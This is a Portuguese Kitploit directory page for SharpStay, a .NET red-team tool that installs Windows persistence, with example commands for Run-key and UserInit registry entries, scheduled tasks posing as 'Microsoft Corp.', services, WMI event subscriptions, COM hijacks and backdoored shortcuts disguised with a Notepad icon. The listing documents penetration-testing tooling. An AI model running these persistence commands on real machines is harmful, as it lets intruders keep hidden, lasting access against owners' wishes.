Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpStay — Ferramenta .NET para instalar persistência no Windows via chaves de registro, tarefas agendadas, serviços, eventos WMI, sequestros COM e backdoors LNK, suportando contextos elevados e não elevados. | Kitploit
Ferramentas/GitHubGitHub/0xthirteen/sharpstay
Mecanismos de PersistênciaPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHub0xthirteen/sharpstay

SharpStay

Ferramenta .NET para instalar persistência no Windows via chaves de registro, tarefas agendadas, serviços, eventos WMI, sequestros COM e backdoors LNK, suportando contextos elevados e não elevados.

Ver Repositório
498100há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpStay - Persistência .NET

Compilação

Para compilar, abra o projeto do Visual Studio e compile para release.

Opções

  • Chaves de Registro Elevadas

  • Chave de Registro UserInit Elevada

  • Tarefa Agendada Elevada

  • Criar Serviço Elevado

  • Assinatura de Evento WMI Elevada

  • Chave de Registro InitMprLogonScript Não Elevada

  • Sequestro de Manipulador COM de Tarefa Agendada Não Elevado

  • Pasta de Junção Não Elevada

  • Misc Adicionar Ação de Tarefa Agendada

  • Misc Diretório de Inicialização

  • Misc Novo LNK

  • Misc Backdoor LNK

  • Misc Nomes de Tarefas

  • Misc Listar Tarefas Agendadas

  • Misc Listar Serviços em Execução

  • Misc Obter Manipuladores COM de Tarefas Agendadas

root@kitploit:~
Sharpstay.exe action=ElevatedRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=UserInitMprLogonScriptKey command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=ElevatedUserInitKey command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=user1 triggertype=logon author=Microsoft Corp. description="Test Task" logonuser=user1
root@kitploit:~
Sharpstay.exe action=ScheduledTaskAction taskname=TestTask command="C:\Windows\temp\fun.exe" folder="\\" actionid=ExecAction
root@kitploit:~
Sharpstay.exe action=SchTaskCOMHijack clsid={a47af52a-27f9-4426-bd2b-727050712db1} dllpath="C:\windows\temp\fun.dll"
root@kitploit:~
Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=WMIEventSub command="C:\Windows\temp\fun.exe" eventname=Debugger attime=startup 
root@kitploit:~
Sharpstay.exe action=JunctionFolder dllpath="C:\windows\temp\fun.dll guid={a47af52a-27f9-4426-bd2b-727050712db1}
root@kitploit:~
Sharpstay.exe action=NewLNK filepath="C:\users\admin\desktop" lnkname="Notepad.lnk" lnktarget="C:\Windows\temp\file.exe" lnkicon="C:\Windows\system32\notepad.exe"
root@kitploit:~
Sharpstay.exe action=BackdoorLNK command="C:\Windows\temp\fun.exe" lnkpath="C:\users\user\desktop\Excel.lnk"
root@kitploit:~
Sharpstay.exe action=ListTaskNames
root@kitploit:~
Sharpstay.exe action=ListScheduledTasks
root@kitploit:~
Sharpstay.exe action=ListRunningServices
root@kitploit:~
Sharpstay.exe action=GetScheduledTaskCOMHandler

cleanup=true é uma opção para cada tipo de persistência.

Parte do StayKit

Baixar ferramenta